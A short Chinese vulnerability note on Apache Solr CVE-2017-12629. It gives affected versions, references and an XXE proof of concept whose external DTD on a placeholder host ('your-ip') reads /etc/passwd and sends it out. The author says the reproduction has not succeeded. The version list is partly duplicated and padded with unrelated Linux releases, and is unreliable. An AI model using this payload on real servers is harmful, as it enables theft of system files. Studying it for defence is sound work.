【初级】solr 命令执行

CVE-2017-12629

漏洞描述：Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法（config路径）可以增加和修改监听器，通过RunExecutableListener执行任意系统命令。

影响版本：Apache Solr before 7.1 with Apache Lucene before 7.1

   RedhatSingle Sign-On 7.0

+ Redhat Linux 6.2 E sparc

+ Redhat Linux 6.2 E i386

+ Redhat Linux 6.2 E alpha

+ Redhat Linux 6.2 sparc

+ Redhat Linux 6.2 i386

+ Redhat Linux 6.2 alpha

Redhat JBoss Portal Platform 6

Redhat JBoss EAP 7 0

Redhat Jboss EAP 6

Redhat JBoss Data Grid 7.0.0

Redhat Enterprise Linux 6

+ Trustix Secure Enterprise Linux 2.0

+ Trustix Secure Linux 2.2

+ Trustix Secure Linux 2.1

+ Trustix Secure Linux 2.0

Redhat Collections for Red Hat EnterpriseLinux 0

Apache Solr 6.6.1

Apache Solr 6.6

Apache Solr 6.5.1

Apache Solr 6.5

Apache Solr 6.4

Apache Solr 6.3

Apache Solr 6.2

Apache Solr 6.6

Apache Solr 6.3

Apache Solr 6.0

ApacheLucene 0

参考资料：

• https://www.cnblogs.com/cute-puli/p/13340249.html
• https://cloud.tencent.com/developer/article/1144777
• https://www.freebuf.com/sectool/159970.html

POC：

<?xml version="1.0" ?><!DOCTYPE root[<!ENTITY % ext SYSTEM "http://your-ip/1.dtd">%ext;%ent;]><r>&data;</r>&wt=xml&defType=xmlparser

漏洞复现：

1.在远程服务器上新建1.dtd，写入如下内容

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

2.在主页刷新抓包，修改部分参数即可达到xxe外部实体注入执行的操作

暂未复现成功